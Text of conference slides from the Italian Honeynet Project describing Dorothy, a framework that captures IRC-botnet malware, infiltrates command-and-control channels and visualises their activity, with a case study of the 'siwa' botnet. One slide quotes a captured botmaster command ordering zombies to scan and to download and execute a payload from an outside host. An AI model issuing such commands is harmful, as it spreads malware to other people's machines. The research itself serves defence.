An Open Botnet Analysis Framework for An Open Botnet Analysis Framework for Automatic Tracking and Activity Visualization Automatic Tracking and Activity Visualization marco riccardi – Italian Chapter - The Honeynet Project marco cremonini – Dept. of Information Technology – Università di Miliano
Defining the problem : IRC botnets Defining the goal to achieve The proposed solution: The Dorothy Framework The Realized proof of concept: honey-dorothy Results Case study: siwa botnet Workplan Conclusions
Botnets are considered one of the most dangerous threat ◦ Hard to keep pace with their evolutions ◦ Hard to protect against their attacks ◦ Hard to mitigate Time between Command and Center (C&C) identification and botnet mitigation is tipically too long Technical issues Legal issues
Mitigation plan should be as quick as possible Automation is required …otherwise, human interaction is needed ◦ Considering social context (legal, culture, etc) ◦ All the contermeasures provided by ISP/LEO (blacklisting, dns update,etc) are to be closely justified before its execution.
A mitigation plan should be as quick as possible Automation is required …otherwise, human interaction is needed ◦ Considering social context (legal, economic, oprational, etc.) ◦ All contermeasures provided by ISP/LEO (blacklisting, DNS update,etc) must be clearly justified before their implementation Developing a framework that automatically provide all information needed by an ISP/LEO to activate a mitigation strategy
Automated framework for IRC botnet analysis ◦ Automatic Malware acquisition & analysis ◦ Automatic C&C IRC channel infiltration ◦ Automatic reporting activity status Interactive graphic front-end Real time information about monitored C&Cs ◦ Defenders can use these information to develop timely countermeasures to mitigate the risks Customizable ◦ Defenders could be alerted when a botnet activity is detected in their network
Malware Collection Module Virtual Honeypot Injection Module Network Analysis Module Data Extraction Module
Infiltration Module Geolocation Module Live Data Extraction Module Data Visualization Module Web Graphical User Interface
Proposed proof of concept Developed using bash scripting language ◦ Fully compatible with POSIX systems ◦ Fully automatized Developed to be modular ◦ Easy integration with other tools ◦ Customizable 90% of its components are open source The Virualization Module has been developed on VMware A migration to VirtualBox is ongoing
Low interaction honeypots ( nepenthes ) All honeypots upload their malwares to a central malware repository Recently has been added the support to the Mwcollect Alliance repository A malware analysis module (static/dynamic) integration is ongoing.
The virtualization enviroment has been developed on VMware enviroment vmtools support the scripting implementation The malware is executed on a virtual machine (Win XP SP2) After three minutes the VM is reverted to its original snapshot
Inspect zombies network behavior during the three minutes of infected VM execution The network traffic is sniffed by tcpdump tool The output is stored into a dump file and sent to the next module
The goal of this module is to extract all relevant information about C&Cs Extracted information are used for botnet classification ◦ C&C IP addresses ◦ C&C Satellites ◦ Hostname associated ◦ Hostname resolved by DNS servers
Infiltrate, Observe, Report IRC-drone ◦ Full bash encoded ◦ Multichannel support ◦ Auto-respond to PING request ◦ The drone injects all the IRC commands extracted from the traffic generated by VM zombies as is. Compatible to non IRC-compliant C&C The connection toward the C&C is anonymized through the TOR network
All the data received and sent to C&Cs are logged into txt files Instant notification by email when : ◦ Topic changement ◦ New command issued by bot master ◦ MODE option modification A full module re-engineerization is ongoing ◦ Multiplatform ◦ Support for more onion networks
Geolocation information give an approximated geographical location of C&Cs ◦ Can be useful to consider the social contex Useful for understanding which law officer notify Provided by GeoCityLite Free, good approximation
All log files generated by the IRC-drone are parsed ◦ Topics extraction ◦ Botmaster nickname/user host extraction ◦ Time delay calculation Between each topic modification Between each PING request (i.e. heartbeat )
Parameter IPs Hosts Ports Zombies Malwares Chans Satellites ALL-Hosts Mail Addr
Shape Color Circle Targets Circle C&C Circle Satellites Circle Spreading Circle Spam Square Services Triange Source
Shape Color Circle Targets Circle C&C Circle Satellites Circle Spreading Circle Spam Square Services Triange Source
Shape Color Circle Targets Circle C&C Circle Satellites Circle Spreading Circle Spam Square Services Triange Source
“Overview first ,zoom and filter, then details on-demand ” B. Shneiderman. The eyes have it: A task by data type taxonomy for information visualizations.
Tested for a period of 27 days between January and March 2009 Two public IPs used for malware acquisition 3900 malware downloaded ◦ 304 unique ◦ 562,657 Mb downloaded 16 unique C&C classified ◦ 50 IRC channels monitored 8992 unique pubblic IPs indentified as zombies
Formed by 5 C&C servers ◦ 2 Located in China ◦ 2 Located in Canada ◦ 1 Located in Holland 7 Different channel names used ◦ #siwa was the most used 37 different C&C satellites providing botnet updating service through HTTP 42 host names related to siwa IP addresses 4346 unique IP addesses identified as zombies
Redesignment of the information flow management ◦ Information repository stored into relational database Evaluate the developing of the core engine by means of other programming languages Integration of a malware analysis module ◦ Dynamical & Static analysis Virtual Honeypot: migration to VirtualBox
New module design and realization o A module for analyzing P2P botnets o A spam-trap implementation is ongoing Development of a new IRC Drone ◦ Multiplatform, distribuited
Data visualization tuning ◦ Investigating new ways for representing botnet data Developing a new web interface o More dynamic o Multi-user / user customizable Improve the notification process o Mailing list o Web 2.0 comunication channels (twitter, feeds, blogs, ..)
The Dorothy Project is an ongoing activity of the Italian Honeynet Project (IHP) Chapter Today, there are different countributors supporting the project: ◦ Two reserchers of the University of Pavia are contributing by integrating their own botnet analysis tools ( H.I.V.E ) with honey-doroty ◦ Three students from the University of Milan are developing new malware analysis modules ◦ The IHP Chapter has ten active participants that are contributing to the realization of a new version of the botnet analysis framework
The Dorothy Project is an ongoing activity of the Italian Honeynet Project (IHP) Chapter Today, there are different countributors supporting the project: ◦ Two reserchers of the University of Pavia are contributing by integrating their own botnet analysis tools ( H.I.V.E ) with honey-doroty ◦ Three students from the University of Milan are developing new malware analysis modules ◦ The IHP Chapter has ten active participants that are contributing to the realization of a new version of the botnet analysis framework ….we hope to receive your supports too!
The Italian Honeynet Chapter – www.honeynet.it marco riccardi – marco.riccardi [at] honeynet [dot] it marco cremonini – marco.cremonini [at] unimi [dot] it
Botmaster execution request ##pi## :* ipscan s.s dcom2 -s ][ * wormride on -s ][ * download http://72.xxx.xxx.xxx/mb2.exe -e –s Zombies response 72.xxx.xxx.xxx:2293 --> :QfNUXNcm!~xqbmgz@92.xxx.xxx.xxx PRIVMSG ##RUSSIA## :-041- Running FTP wormride thread 72.xxx.xxx.xxx:2293 --> :Tdkzdtwh!~bxoluj@mna75- 4-82-225-77-1.yyy.yyy.net PRIVMSG ##russia## :- 04wormride- 1. tftp transfer to 82.xxx.xxx.xxx complete
• Bar chars Number of DNS query executed by analized malware,grouped by C&C • Pie chars Number of DNS query
• Topic activity • C&C heart-beat Time avarege between TOPIC Time avarege between two PING changement request
A full module re-engineering is ongoing The new drone will be multiplatform Anyone can support the infiltration process It will support more than one onion network It will send its log to a central log concentrator Integrity and confidentiality have to managed accurately
Recommend
More recommend